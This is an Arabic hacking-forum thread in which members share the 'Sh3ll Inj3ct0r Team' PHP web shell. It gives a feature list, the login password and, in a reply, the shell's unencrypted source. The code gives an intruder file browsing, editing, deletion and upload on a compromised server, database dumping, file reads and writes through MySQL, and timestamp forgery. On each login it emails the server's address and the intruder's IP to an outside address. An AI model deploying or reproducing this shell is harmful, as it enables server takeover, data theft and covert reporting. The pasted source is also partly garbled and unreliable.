[ Shell ] sh3ll inj3ct0r team

الموضوع في 'قسم الأدوات' بواسطة Mr.shares, بتاريخ ‏17 مايو 2012.

الوسوم:
حالة الموضوع:
مغلق
  1. Mr.shares

    Mr.shares Developer

    الأنتساب:
    ‏17 مايو 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    ارض المجاهدين
    السلام عليكم ورحمه الله وبركآته ..

    يالله حيى اعضاء شبكة عراق تيم !!:{ ..

    هاذا الشل لفريق : inj3ct0r team ..

    بعض المعلومات عن الشل ..

    [​IMG]

    1-bybass safe mode
    2-MySqL Dump Database
    3-MySql Edit0r
    4-Command Sh3ll
    5-Brute Ftp & Cpanel
    6-back Connect
    7-Upload Files
    etc...

    صور للشل ..

    صفحه الدخول ..

    [​IMG]

    الشل من الداخل ..

    [​IMG]

    السورس كود i:q^: ..

    sh3ll inj3ct0r team-شبكة عراق تيم.txt

    password: inj3ct0r

    موفقين ان شاء الله .. [​IMG]


     
  2. MR.X7

    MR.X7 Developer

    الأنتساب:
    ‏9 مايو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طالب [3 ثنوي]
    الإقامة:
    مكة المكرمة
    رد: sh3ll inj3ct0r team

    وعليكم السلام ورحمة الله وبركاته

    ماشاء الله عليك ياشرس دايم ممتعنا بطرحك

    وبالدوات النادرة لبى قلبك , الف شكر يالغلا

    هذا الشل بدون تشفير للي يبي يعدل الباسورد!:"

    كود PHP:
    <?php
    error_reporting
    (7);
    @
    set_magic_quotes_runtime(0);
    ob_start();
    $mtime explode(' 'microtime());
    $starttime $mtime[1] + $mtime[0];
    define('SA_ROOT'str_replace('\\''/'dirname(__FILE__)).'/');
    //define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
    define('IS_WIN'DIRECTORY_SEPARATOR == '\\');
    define('IS_COM'class_exists('COM') ? );
    define('IS_GPC'get_magic_quotes_gpc());
    $dis_func get_cfg_var('disable_functions');
    define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? );
    @
    set_time_limit(0);

    foreach(array(
    '_GET','_POST') as $_request) {
        foreach($
    $_request as $_key => $_value) {
            if (
    $_key{0} != '_') {
                if (
    IS_GPC) {
                    
    $_value s_array($_value);
                }
                $
    $_key $_value;
            }
        }
    }

    /*=================  Info Login  ================*/
    $admin = array();
    $admin['check'] = true;
    $admin['pass']  = 'inj3ct0r'// Password login
    $admin['cookiepre'] = '';
    $admin['cookiedomain'] = '';
    $admin['cookiepath'] = '/';
    $admin['cookielife'] = 86400;
    /*===================== End =====================*/

    if ($charset == 'utf8') {
        
    header("content-Type: text/html; charset=utf-8");
    } elseif (
    $charset == 'big5') {
        
    header("content-Type: text/html; charset=big5");
    } elseif (
    $charset == 'gbk') {
        
    header("content-Type: text/html; charset=gbk");
    } elseif (
    $charset == 'latin1') {
        
    header("content-Type: text/html; charset=iso-8859-2");
    }

    $self $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
    $timestamp time();

    /*===================== Login =====================*/
    if ($action == "logout") {
        
    scookie('vbapass''', -86400 365);
        
    p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
        
    p('<body background=black>');
        exit;
    }
    if(
    $admin['check']) {
        if (
    $doing == 'login') {
            if (
    $admin['pass'] == $password) {
                
    scookie('vbapass'$password);

    $time_***** = "".date("d/m/Y - H:i:s")."";
    $ip_remote $_SERVER["REMOTE_ADDR"];
    $from_*****code '*****@'.gethostbyname($_SERVER['SERVER_NAME']).'';
    $to_email 'submit[at]1337day.com';
    $server_mail "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
    $linkcr "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_*****";
    $header "From: $from_*****code\r\nReply-to: $from_*****code";
    @
    mail($to_email$server_mail$linkcr$header);
                
    p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
                
    p('<body bgcolor=black>
    <BR><BR><div align=center><font color=#4ff707 face=tahoma size=5>Sh3ll Inj3ct0r Team<BR><img src=http://www.alamuae.com/up/uplong/loading326953187146197.gif></div>'
    );
                exit;
            }

        else
        {
        
    $err_mess '<table width=100%><tr><td bgcolor=#000000 width=100% height=70><div align=center><font color=#f70713 face=tahoma size=5><blink>"PaSsw0rd eRr0r"</blink><BR></font></div></td></tr></table>';
    echo 
    $err_mess;
        }}
        if (
    $_COOKIE['vbapass']) {
            if (
    $_COOKIE['vbapass'] != $admin['pass']) {
                
    loginpage();
            }
        } else {
            
    loginpage();
        }
    }
    /*===================== Login =====================*/

    $errmsg '';

    if (
    $action == 'phpinfo') {
        if (
    IS_PHPINFO) {
            
    phpinfo();
        } else {
            
    $errmsg 'phpinfo() function has non-permissible';
        }
    }


    if (
    $doing == 'downfile' && $thefile) {
        if (!@
    file_exists($thefile)) {
            
    $errmsg 'The file you want Downloadable was nonexistent';
        } else {
            
    $fileinfo pathinfo($thefile);
            
    header('Content-type: application/x-'.$fileinfo['extension']);
            
    header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
            
    header('Content-Length: '.filesize($thefile));
            @
    readfile($thefile);
            exit;
        }
    }


    if (
    $doing == 'backupmysql' && !$saveasfile) {
        
    dbconn($dbhost$dbuser$dbpass$dbname$charset$dbport);
        
    $table array_flip($table);
        
    $result q("SHOW tables");
        if (!
    $resultp('<h2>'.mysql_error().'</h2>');
        
    $filename basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
        
    header('Content-type: application/unknown');
        
    header('Content-Disposition: attachment; filename='.$filename);
        
    $mysqldata '';
        while (
    $currow mysql_fetch_array($result)) {
            if (isset(
    $table[$currow[0]])) {
                
    $mysqldata .= sqldumptable($currow[0]);
            }
        }
        
    mysql_close();
        exit;
    }

    // Mysql
    if($doing=='mysqldown'){
        if (!
    $dbname) {
            
    $errmsg 'Please input dbname';
        } else {
            
    dbconn($dbhost$dbuser$dbpass$dbname$charset$dbport);
            if (!
    file_exists($mysqldlfile)) {
                
    $errmsg 'The file you want Downloadable was nonexistent';
            } else {
                
    $result q("select load_file('$mysqldlfile');");
                if(!
    $result){
                    
    q("DROP TABLE IF EXISTS tmp_angel;");
                    
    q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
                    
    //Download SQL
                    
    q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
                    
    $result q("select content from tmp_angel");
                    
    q("DROP TABLE tmp_angel");
                }
                
    $row = @mysql_fetch_array($result);
                if (!
    $row) {
                    
    $errmsg 'Load file failed '.mysql_error();
                } else {
                    
    $fileinfo pathinfo($mysqldlfile);
                    
    header('Content-type: application/x-'.$fileinfo['extension']);
                    
    header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
                    
    header("Accept-Length: ".strlen($row[0]));
                    echo 
    $row[0];
                    exit;
                }
            }
        }
    }

    ?>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title><?php echo str_replace('.','','Sh3ll Inj3ct0r Team');?></title>
    <style type="text/css">
    body,td{font: 10pt Tahoma;color:#02fc0b;line-height: 16px;}

    a {color: #05fc25;text-decoration:none;}
    a:hover{color: #f00;text-decoration:underline;}
    .alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#000000;padding:5px 10px 5px 5px;}
    .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#000000;padding:5px 10px 5px 5px;}
    .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#111111;padding:5px 10px 5px 5px;}
    .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#000000;padding:5px 10px 5px 5px;}
    .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#000000;padding:5px 10px 5px 5px;}
    .head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#000000;padding:5px 10px 5px 5px;font-weight:bold;}
    .head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#000000;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}
    .head td span{font-weight:normal;}
    form{margin:0;padding:0;}
    h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#4224d6;}
    ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
    u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
    input, textarea, button
    {
        font-size: 9pt;
        color: #05f90e;
        font-family: verdana, sans-serif;
        background-color: #000000;
        border-left: 1px solid #74A202;
        border-top: 1px solid #74A202;
        border-right: 1px solid #74A202;
        border-bottom: 1px solid #74A202;
    }
    select
    {
        font-size: 8pt;
        font-weight: normal;
        color: #ccc;
        font-family: verdana, sans-serif;
        background-color: #202020;
    }

    </style>
    <script type="text/javascript">
    function CheckAll(form) {
        for(var i=0;i<form.elements.length;i++) {
            var e = form.elements[i];
            if (e.name != 'chkall')
            e.checked = form.chkall.checked;
        }
    }
    function $(id) {
        return document.getElementById(id);
    }
    function goaction(act){
        $('goaction').action.value=act;
        $('goaction').submit();
    }
    </script>
    </head>
    <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://www.club-h.co.cc/photo.jpg>


    <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">
                    <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">
                        <tr>

                      </div>
                    </td>
                        </tr>
                    </table>
                 </div>
     <script>
     var ld=(document.all);
      var ns4=document.layers;
     var ns6=document.getElementById&&!document.all;
     var ie4=document.all;
      if (ns4)
         ld=document.loading;
     else if (ns6)
         ld=document.getElementById("Wait Please For Inj3ct0r ***** loading").style;
     else if (ie4)
         ld=document.all.loading.style;
      function init()
     {
     if(ns4){ld.visibility="hidden";}
     else if (ns6||ie4) ld.display="none";
     }
     </script>




    <table width="100%" border="0" cellpadding="0" cellspacing="0">
        <tr class="head_small">
            <td  width=100%>
            <table width=100%><tr class="head_small"><td  width=86px><a title="1337day Inj3ct0r Exploit Database : vulnerability : 0day : *****code by Inj3ct0r Team" href="<?php $self;?>"><img src="http://www.alamuae.com/up/uplong/banner3269541083055272.jpg" height=180 border=0></a></td><td>
            <div style="font-size:40px;font-weight:bold;font-style:normal;color:#468100;text-decoration:none;text-shadow:#09fd02 3px 3px  3px;font-variant:small-caps;">[--Sh3lL Inj3ct0r Team--]</div><br>
            <span style="float:left;"> <?php echo "HosT Server: ".$_SERVER['HTTP_HOST']."";?>  | <a href="http://www.1337day.com" rel="nofollow" target="_blank"><?php echo str_replace('.','','1337day Inj3ct0r Exploit Database : vulnerability : 0day : *****code by Inj3ct0r Team');?> </a> | <a href="javascript:goaction('logout');"><font color=red>Log0ut</font></a></span> <br />

            <?php
            $curl_on 
    = @function_exists('curl_version');
            
    $mysql_on = @function_exists('mysql_connect');
            
    $mssql_on = @function_exists('mssql_connect');
            
    $pg_on = @function_exists('pg_connect');
            
    $ora_on = @function_exists('ocilogon');
    echo ((
    $safe_mode)?("Safe Mod: <b><font color=021ffc>ON</font></b> - "):("Safe m0de: <b><font color=red>OFF</font></b>  -"));
    echo 
    "pHp V3rSi0n: <b>".@phpversion()."</b> - ";
            echo 
    "CurL: ".(($curl_on)?("<b><font color=021ffc>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));
            echo 
    "MysqL: <b>";
    $mysql_on = @function_exists('mysql_connect');
    if(
    $mysql_on){
    echo 
    "<font color=021ffc>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }
    echo 
    "MsSqL: <b>";
    $mssql_on = @function_exists('mssql_connect');
    if(
    $mssql_on){echo "<font color=021ffc>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
    echo 
    "PostgreSql: <b>";
    $pg_on = @function_exists('pg_connect');
    if(
    $pg_on){echo "<font color=021ffc>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}
    echo 
    "Oracle: <b>";
    $ora_on = @function_exists('ocilogon');
    if(
    $ora_on){echo "<font color=021ffc>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}

    echo 
    "Disable functions : <b>";
    if(
    ''==($df=@ini_get('disable_functions'))){echo "<font color=021ffc>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}

    echo 
    "<font color=white>uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";
    echo 
    "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";

            
    ?>

            </td></tr></table></td>
        </tr>
        <tr class="alt1">
            <td  width=10%><span style="float:left;">Y0uR IP: <?php echo "<font color=fdfdfd>".$_SERVER['REMOTE_ADDR']."</font>";?> </span>   <br />
    <br />

                            <a href="javascript:goaction('file');">H0me</a> |
                <a href="javascript:goaction('sqladmin');">MySqL Dump Database</a> |
                <a href="javascript:goaction('sqlfile');">MySql Edit0r</a> |
                <a href="javascript:goaction('*****');">Command Sh3ll</a>
                <?php if (!IS_WIN) {?> | <a href="javascript:goaction('brute');">Brute Ftp & Cpanel</a> <?php }?>
                <?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">back Connect</a><?php }?>
                          | <a href="javascript:open('http://www.1337day.com');">inj3ct0r Team WebSite</a>
                          | <a href="javascript:open('http://1337day.com/submit');">Submit Exploit</a>
            </td>
        </tr>
    </table>
    <table width="100%" border="0" cellpadding="5" cellspacing="0"><tr><td>
    <?php

    formhead
    (array('name'=>'goaction'));
    makehide('action');
    formfoot();

    $errmsg && m($errmsg);

    // Dir function
    !$dir && $dir '.';
    $nowpath getPath(SA_ROOT$dir);
    if (
    substr($dir, -1) != '/') {
        
    $dir $dir.'/';
    }
    $uedir ue($dir);

    if (!
    $action || $action == 'file') {

        
    // Non-writeable
        
    $dir_writeable = @is_writable($nowpath) ? 'Writable' 'Chm0d dir';

        
    // Delete dir
        
    if ($doing == 'deldir' && $thefile) {
            if (!
    file_exists($thefile)) {
                
    m($thefile.' directory does not exist');
            } else {
                
    m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' 'Failed'));
            }
        }

        
    // Create new dir
        
    elseif ($newdirname) {
            
    $mkdirs $nowpath.$newdirname;
            if (
    file_exists($mkdirs)) {
                
    m('Directory has already existed');
            } else {
                
    m('Direct0rt Created '.(@mkdir($mkdirs,0777) ? 'success' 'failed'));
                @
    chmod($mkdirs,0777);
            }
        }

        
    // Upload file
        
    elseif ($doupfile) {
            
    m('File Upl0ad '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' 'FaileD'));
        }

        
    // Edit file
        
    elseif ($editfilename && $filecontent) {
            
    $fp = @fopen($editfilename,'w');
            
    m('Save File '.(@fwrite($fp,$filecontent) ? 'success' 'Failed'));
            @
    fclose($fp);
        }

        
    // Modify
        
    elseif ($pfile && $newperm) {
            if (!
    file_exists($pfile)) {
                
    m('The original file does not exist');
            } else {
                
    $newperm base_convert($newperm,8,10);
                
    m('Modify File attributes '.(@chmod($pfile,$newperm) ? 'success' 'Failed'));
            }
        }

        
    // Rename
        
    elseif ($oldname && $newfilename) {
            
    $nname $nowpath.$newfilename;
            if (
    file_exists($nname) || !file_exists($oldname)) {
                
    m($nname.' has already existed or original file does not exist');
            } else {
                
    m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' 'failed'));
            }
        }

        
    // Copu
        
    elseif ($sname && $tofile) {
            if (
    file_exists($tofile) || !file_exists($sname)) {
                
    m('The goal file has already existed or original file does not exist');
            } else {
                
    m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' 'failed'));
            }
        }

        
    // File exit
        
    elseif ($curfile && $tarfile) {
            if (!@
    file_exists($curfile) || !@file_exists($tarfile)) {
                
    m('The goal file has already existed or original file does not exist');
            } else {
                
    $time = @filemtime($tarfile);
                
    m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' 'failed'));
            }
        }

        
    // Date
        
    elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
            if (!@
    file_exists($curfile)) {
                
    m(basename($curfile).' does not exist');
            } else {
                
    $time strtotime("$year-$month-$day $hour:$minute:$second");
                
    m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' 'failed'));
            }
        }

        
    // Download
        
    elseif($doing == 'downrar') {
            if (
    $dl) {
                
    $dfiles='';
                foreach (
    $dl as $filepath => $value) {
                    
    $dfiles.=$filepath.',';
                }
                
    $dfiles=substr($dfiles,0,strlen($dfiles)-1);
                
    $dl=explode(',',$dfiles);
                
    $zip=new PHPZip($dl);
                
    $code=$zip->out;
                
    header('Content-type: application/octet-stream');
                
    header('Accept-Ranges: bytes');
                
    header('Accept-Length: '.strlen($code));
                
    header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
                echo 
    $code;
                exit;
            } else {
                
    m('First select file');
            }
        }

        
    // Delete file
        
    elseif($doing == 'delfiles') {
            if (
    $dl) {
                
    $dfiles='';
                
    $succ $fail 0;
                foreach (
    $dl as $filepath => $value) {
                    if (@
    unlink($filepath)) {
                        
    $succ++;
                    } else {
                        
    $fail++;
                    }
                }
                
    m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
            } else {
                
    m('First select file');
            }
        }

        
    // Function Newdir
        
    formhead(array('name'=>'createdir'));
        
    makehide('newdirname');
        
    makehide('dir',$nowpath);
        
    formfoot();
        
    formhead(array('name'=>'fileperm'));
        
    makehide('newperm');
        
    makehide('pfile');
        
    makehide('dir',$nowpath);
        
    formfoot();
        
    formhead(array('name'=>'copyfile'));
        
    makehide('sname');
        
    makehide('tofile');
        
    makehide('dir',$nowpath);
        
    formfoot();
        
    formhead(array('name'=>'rename'));
        
    makehide('oldname');
        
    makehide('newfilename');
        
    makehide('dir',$nowpath);
        
    formfoot();
        
    formhead(array('name'=>'fileopform'));
        
    makehide('action');
        
    makehide('opfile');
        
    makehide('dir');
        
    formfoot();


    ?>
    <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
      <form action="" method="post" id="godir" name="godir">
      <tr>
        <td nowrap>(<?php echo $dir_writeable;?><?php echo getChmod($nowpath);?>)</td>
        <td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
        <td nowrap><input class="bt" value="G0" type="submit"></td>
      </tr>
      </form>
    </table>
    <script type="text/javascript">
    function createdir(){
        var newdirname;
        newdirname = prompt('Name Please:', '');
        if (!newdirname) return;
        $('createdir').newdirname.value=newdirname;
        $('createdir').submit();
    }
    function fileperm(pfile){
        var newperm;
        newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
        if (!newperm) return;
        $('fileperm').newperm.value=newperm;
        $('fileperm').pfile.value=pfile;
        $('fileperm').submit();
    }
    function copyfile(sname){
        var tofile;
        tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
        if (!tofile) return;
        $('copyfile').tofile.value=tofile;
        $('copyfile').sname.value=sname;
        $('copyfile').submit();
    }
    function rename(oldname){
        var newfilename;
        newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
        if (!newfilename) return;
        $('rename').newfilename.value=newfilename;
        $('rename').oldname.value=oldname;
        $('rename').submit();
    }
    function dofile(doing,thefile,m){
        if (m && !confirm(m)) {
            return;
        }
        $('filelist').doing.value=doing;
        if (thefile){
            $('filelist').thefile.value=thefile;
        }
        $('filelist').submit();
    }
    function createfile(nowpath){
        var filename;
        filename = prompt('Name Please:', '');
        if (!filename) return;
        opfile('editfile',nowpath + filename,nowpath);
    }
    function opfile(action,opfile,dir){
        $('fileopform').action.value=action;
        $('fileopform').opfile.value=opfile;
        $('fileopform').dir.value=dir;
        $('fileopform').submit();
    }
    function godir(dir,view_writable){
        if (view_writable) {
            $('godir').view_writable.value=1;
        }
        $('godir').dir.value=dir;
        $('godir').submit();
    }
    </script>
      <?php
        tbhead
    ();
        
    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data"><tr class="alt1"><td colspan="7" style="padding:5px;">');
        
    p('<div style="float:right;"><input class="input" name="uploadfile" value="" type="file" /> <input class="" name="doupfile" value="Upl0ad" type="submit" /><input name="uploaddir" value="'.$dir.'" type="hidden" /><input name="dir" value="'.$dir.'" type="hidden" /></div>');

        if (
    $view_writable) {

        } else {

        }
        
    p('  <a href="javascript:createdir();">Create Direct0ry</a> | <a href="javascript:createfile(\''.$nowpath.'\');">Create File</a>');
        if (
    IS_WIN && IS_COM) {
            
    $obj = new COM('scripting.filesystemobject');
            if (
    $obj && is_object($obj)) {
                
    $DriveTypeDB = array(=> 'Unknow',=> 'Removable',=> 'Fixed',=> 'Network',=> 'CDRom',=> 'RAM Disk');
                foreach(
    $obj->Drives as $drive) {
                    if (
    $drive->DriveType == 2) {
                        
    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Size:'.sizecount($drive->TotalSize).'
    Free:'
    .sizecount($drive->FreeSpace).'
    Type:'
    .$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
                    } else {
                        
    p(' | <a href="javascript:godir(\''.$drive->Path.'/\');" title="Type:'.$DriveTypeDB[$drive->DriveType].'">'.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')</a>');
                    }
                }
            }
        }

        
    p('</td></tr></form>');

        
    p('<tr class="head"><td>&nbsp;</td><td>File Name</td><td width="16%">Last M0dified</td><td width="10%">Size</td><td width="20%">Chm0d / PermS</td><td width="22%">Acti0n</td></tr>');

        
    // Get path
        
    $dirdata=array();
        
    $filedata=array();

        if (
    $view_writable) {
            
    $dirdata GetList($nowpath);
        } else {
            
    // Open dir
            
    $dirs=@opendir($dir);
            while (
    $file=@readdir($dirs)) {
                
    $filepath=$nowpath.$file;
                if(@
    is_dir($filepath)){
                    
    $dirdb['filename']=$file;
                    
    $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
                    
    $dirdb['dirchmod']=getChmod($filepath);
                    
    $dirdb['dirperm']=getPerms($filepath);
                    
    $dirdb['fileowner']=getUser($filepath);
                    
    $dirdb['dirlink']=$nowpath;
                    
    $dirdb['server_link']=$filepath;
                    
    $dirdb['client_link']=ue($filepath);
                    
    $dirdata[]=$dirdb;
                } else {
                    
    $filedb['filename']=$file;
                    
    $filedb['size']=sizecount(@filesize($filepath));
                    
    $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
                    
    $filedb['filechmod']=getChmod($filepath);
                    
    $filedb['fileperm']=getPerms($filepath);
                    
    $filedb['fileowner']=getUser($filepath);
                    
    $filedb['dirlink']=$nowpath;
                    
    $filedb['server_link']=$filepath;
                    
    $filedb['client_link']=ue($filepath);
                    
    $filedata[]=$filedb;
                }
            }
    // while
            
    unset($dirdb);
            unset(
    $filedb);
            @
    closedir($dirs);
        }
        @
    sort($dirdata);
        @
    sort($filedata);
        
    $dir_i '0';
        foreach(
    $dirdata as $key => $dirdb){
            if(
    $dirdb['filename']!='..' && $dirdb['filename']!='.') {
                
    $thisbg bg();
                
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                
    p('<td width="2%" nowrap><font face="wingdings" size="3">0</font></td>');
                
    p('<td><a href="javascript:godir(\''.$dirdb['server_link'].'\');">'.$dirdb['filename'].'</a></td>');
                
    p('<td nowrap>'.$dirdb['mtime'].'</td>');
                
    p('<td nowrap>--</td>');
                
    p('<td nowrap>');
                
    p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirchmod'].'</a> / ');
                
    p('<a href="javascript:fileperm(\''.$dirdb['server_link'].'\');">'.$dirdb['dirperm'].'</a>'.$dirdb['fileowner'].'</td>');
                
    p('<td nowrap><a href="javascript:dofile(\'deldir\',\''.$dirdb['server_link'].'\',\'Are you sure will delete '.$dirdb['filename'].'? \\n\\n\')">DeLete</a> | <a href="javascript:rename(\''.$dirdb['server_link'].'\');">Rename</a></td>');
                
    p('</tr>');
                
    $dir_i++;
            } else {
                if(
    $dirdb['filename']=='..') {
                    
    p('<tr class=fout>');
                    
    p('<td align="center"><font face="Wingdings 3" size=4>=</font></td><td nowrap colspan="5"><a href="javascript:godir(\''.getUpPath($nowpath).'\');">Back To Directory</a></td>');
                    
    p('</tr>');
                }
            }
        }

        
    p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
        
    p('<form id="filelist" name="filelist" action="'.$self.'" method="post">');
        
    makehide('action','file');
        
    makehide('thefile');
        
    makehide('doing');
        
    makehide('dir',$nowpath);
        
    $file_i '0';
        foreach(
    $filedata as $key => $filedb){
            if(
    $filedb['filename']!='..' && $filedb['filename']!='.') {
                
    $fileurl str_replace(SA_ROOT,'',$filedb['server_link']);
                
    $thisbg bg();
                
    p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
                
    p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl['.$filedb['server_link'].']"></td>');
                
    p('<td><a href="'.$fileurl.'" rel="nofollow" target="_blank">'.$filedb['filename'].'</a></td>');
                
    p('<td nowrap>'.$filedb['mtime'].'</td>');
                
    p('<td nowrap>'.$filedb['size'].'</td>');
                
    p('<td nowrap>');
                
    p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['filechmod'].'</a> / ');
                
    p('<a href="javascript:fileperm(\''.$filedb['server_link'].'\');">'.$filedb['fileperm'].'</a>'.$filedb['fileowner'].'</td>');
                
    p('<td nowrap>');
                
    p('<a href="javascript:dofile(\'downfile\',\''.$filedb['server_link'].'\');">Downl0ad</a> | ');
                
    p('<a href="javascript:copyfile(\''.$filedb['server_link'].'\');">C0py</a> | ');
                
    p('<a href="javascript:opfile(\'editfile\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Edit</a> | ');
                
    p('<a href="javascript:rename(\''.$filedb['server_link'].'\');">Rename</a> | ');
                
    p('<a href="javascript:opfile(\'newtime\',\''.$filedb['server_link'].'\',\''.$filedb['dirlink'].'\');">Tim3</a>');
                
    p('</td></tr>');
                
    $file_i++;
            }
        }
        
    p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Packigg Downl0ad Selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete Selected</a></td><td colspan="4" align="right">'.$dir_i.' DIR / '.$file_i.' FILES</td></tr>');
        
    p('</form></table>');
    }
    // end dir

    elseif ($action == 'sqlfile') {
        if(
    $doing=="mysqlupload"){
            
    $file $_FILES['uploadfile'];
            
    $filename $file['tmp_name'];
            if (
    file_exists($savepath)) {
                
    m('The goal file has already existed');
            } else {
                if(!
    $filename) {
                    
    m('Please choose a file');
                } else {
                    
    $fp=@fopen($filename,'r');
                    
    $contents=@fread($fpfilesize($filename));
                    @
    fclose($fp);
                    
    $contents bin2hex($contents);
                    if(!
    $upname$upname $file['name'];
                    
    dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
                    
    $result q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
                    
    m($result 'Upload success' 'Upload has failed: '.mysql_error());
                }
            }
        }
    ?>
    <script type="text/javascript">
    function mysqlfile(doing){
        if(!doing) return;
        $('doing').value=doing;
        $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
        $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
        $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
        $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
        $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
        $('mysqlfile').charset.value=$('dbinfo').charset.value;
        $('mysqlfile').submit();
    }
    </script>
    <?php
        
    !$dbhost && $dbhost '1337day.com';
        !
    $dbuser && $dbuser 'root';
        !
    $dbport && $dbport '3306';
        
    $charsets = array(''=>'Default','gbk'=>'GBK''big5'=>'Big5''utf8'=>'UTF-8''latin1'=>'Latin1');
        
    formhead(array('title'=>'MySql Inf0rmation','name'=>'dbinfo'));
        
    makehide('action','sqlfile');
        
    p('<p>');
        
    p('DBHost:');
        
    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
        
    p(':');
        
    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
        
    p('DBUser:');
        
    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
        
    p('DBPass:');
        
    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
        
    p('DBName:');
        
    makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
        
    p('DBCharset:');
        
    makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
        
    p('</p>');
        
    formfoot();
        
    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
        
    p('<h2>Upl0ad File</h2>');
        
    p('<p><b></b></p>');
        
    p('<p>SaVe Path: <input class="input" name="savepath" size="45" type="text" /> Ch00s3 Fil3: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upl0aD</a></p>');
        
